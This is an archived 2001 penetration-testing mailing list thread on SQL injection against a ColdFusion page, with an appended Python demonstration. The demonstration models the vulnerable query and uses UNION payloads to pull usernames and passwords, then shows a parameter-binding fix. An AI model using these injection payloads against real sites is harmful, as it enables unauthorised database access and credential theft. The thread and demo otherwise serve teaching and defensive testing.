Penetration Testing mailing list archives
Re: CFM SQL injection
From: "Kevin Spett" <kspett () spidynamics com>
Date: Mon, 17 Dec 2001 15:39:29 -0800
It looks like the query that you're attacking isn't prepending and appending quotes to your input. The string build probably looks a lil' sumthin' like this:

Query = "SELECT FieldOne, FieldTwo, FieldThree FROM TableName WHERE PageID = " & strPageID

This means that there is no need to use quotes in order to perform a successful injection. So, try something like this:

http://www.server.com/page.cfm?page_id=9999 UNION SELECT OtherField FROM OtherTable WHERE 1=1

Hopefully this will return an error complaining about an invalid table name, or at least another error that may give you a better idea of what the web application is doing with your argument.

Kevin Spett
Archbishop of SQL Injection
SPI Dynamics, Inc.

----- Original Message -----
From: "Charlie Liserne" <Chili () SexMagnet com>
To: <pen-test () securityfocus com>
Sent: Saturday, December 15, 2001 2:22 PM
Subject: CFM SQL injection
Hello guys,

I'm performing a pen-test against a web site with ColdFusion installed. I obtain some error information, but I'm not able to do anything because the server never understands the parameters I send. The correct page is as follows:

http://www.server.com/page.cfm?page_id=8

My probes are as follows:

-------------------
Request: http://www.server.com/page.cfm?page_id=8'
Result:
Invalid parameter type
Cannot convert 19' to number.
Please, check the ColdFusion manual for the allowed conversions between data types
The error occurred while processing an element with a general identifier of (CFPARAM), occupying document position (5:1) to (5:61).
Template: c:\blabla\page.cfm
Query String: page_id=19'
------------------------

So it isn't interpreting the ' and I don't know how to execute commands. It seems that it is not an SQL issue; instead it looks like a ColdFusion error.

Another probe follows:

--------------------
Request: http://www.server.com/page.cfm?page_id=0
Result:
ODBC Error Code = 37000 (Syntax error or access violation)
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 3: Incorrect syntax near '='.
The error occurred while processing an element with a general identifier of (CFQUERY), occupying document position (15:1) to (16:65).
------------------

Okay, I get an error from the SQL database. But I still don't know how to take advantage of it. I don't know the database name and I have very little info about it.

Also, there are two more interesting probes:

---------------------------
Request: http://www.server.com/page.cfm?page_id=3,
Result:
Invalid parameter type
Cannot convert 3, to number.
Please, check the ColdFusion manual for the allowed conversions between data types
The error occurred while processing an element with a general identifier of (CFPARAM), occupying document position (5:1) to (5:61).
----------------------------
Request: http://www.server.com/page.cfm?page_id=3,4
Result:
ODBC Error Code = 37000 (Syntax error or access violation)
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 3: Incorrect syntax near ','.
The error occurred while processing an element with a general identifier of (CFQUERY), occupying document position (6:1) to (6:72).
-------------------------------

Do you know how to exploit this (if it's possible)?

Regards,
Charlie.

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
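Kevin's point, that a numeric parameter glued straight onto the WHERE clause needs no quote to inject, worked through as an added example. This is not code from either poster or from ColdFusion; it is a Python/sqlite3 model of the string build Kevin infers (`"... WHERE PageID = " & strPageID`), with an invented `pages`/`users` schema standing in for the target database. It shows the three outcomes a tester walks through: the legitimate request, a UNION with the wrong column count (the kind of informative error Kevin hopes for), and a UNION with the right column count that pulls rows from another table. The safe variant binds the value as an integer, the analogue of ColdFusion's `cfqueryparam` with `cfsqltype="cf_sql_integer"`.

```python
import sqlite3


def build_db():
    """Constructed in-memory stand-in for the site's database.
    Table and column names are assumptions for this example, not
    anything from Charlie's target."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE pages (page_id INTEGER, title TEXT, body TEXT);
        INSERT INTO pages VALUES (8, 'Home', 'Welcome');
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 's3cret');
        """
    )
    return con


def lookup_page_vulnerable(con, page_id):
    """Mirrors the string build Kevin infers:
    Query = "SELECT ... WHERE PageID = " & strPageID
    No quotes around the value, so the input is parsed as SQL."""
    sql = "SELECT page_id, title, body FROM pages WHERE page_id = " + page_id
    return con.execute(sql).fetchall()


def lookup_page_safe(con, page_id):
    """Analogue of <cfqueryparam cfsqltype="cf_sql_integer">:
    coerce to an integer, then bind it as a parameter, so the
    value can never become part of the statement text."""
    pid = int(page_id)  # "9999 UNION SELECT ..." raises ValueError here
    return con.execute(
        "SELECT page_id, title, body FROM pages WHERE page_id = ?", (pid,)
    ).fetchall()


def probe(con, page_id):
    """Run one request against the vulnerable build and report it the way
    the CFQUERY error page would: ('ok', rows) or ('error', message)."""
    try:
        return ("ok", lookup_page_vulnerable(con, page_id))
    except sqlite3.Error as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = build_db()
    for value in (
        "8",                                                    # legitimate
        "9999 UNION SELECT username FROM users",                # Kevin's first try
        "9999 UNION SELECT username, password, 1 FROM users",   # column count fixed
    ):
        print(repr(value), "->", probe(db, value))
    try:
        lookup_page_safe(db, "9999 UNION SELECT username, password, 1 FROM users")
    except ValueError as exc:
        print("safe build rejected the payload:", exc)
```

The first UNION fails because the injected SELECT has one column while the original has three; that error reveals the column count, and padding the payload to three columns (constants such as `1` fill slots whose type you do not yet know) makes the second UNION return the `users` row in the page's normal output. Note that the hardening sits on the query, not on the front-door type check: Charlie's own trace shows CFPARAM accepted `3,4` and handed it to CFQUERY, so a numeric check alone is not what keeps the value out of the SQL.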
Current thread:
- SQL INJECTION - ORACLE foo bar (Dec 10)
- Re: SQL INJECTION - ORACLE Michael Haunzwickl (Dec 10)
- CFM SQL injection Charlie Liserne (Dec 17)
- Re: CFM SQL injection Kevin Spett (Dec 19)
- Re: CFM SQL injection Charlie Liserne (Dec 24)
- CFM SQL injection Charlie Liserne (Dec 17)
- Re: SQL INJECTION - ORACLE Michael Haunzwickl (Dec 10)
- Re: SQL INJECTION - ORACLE Kevin Spett (Dec 10)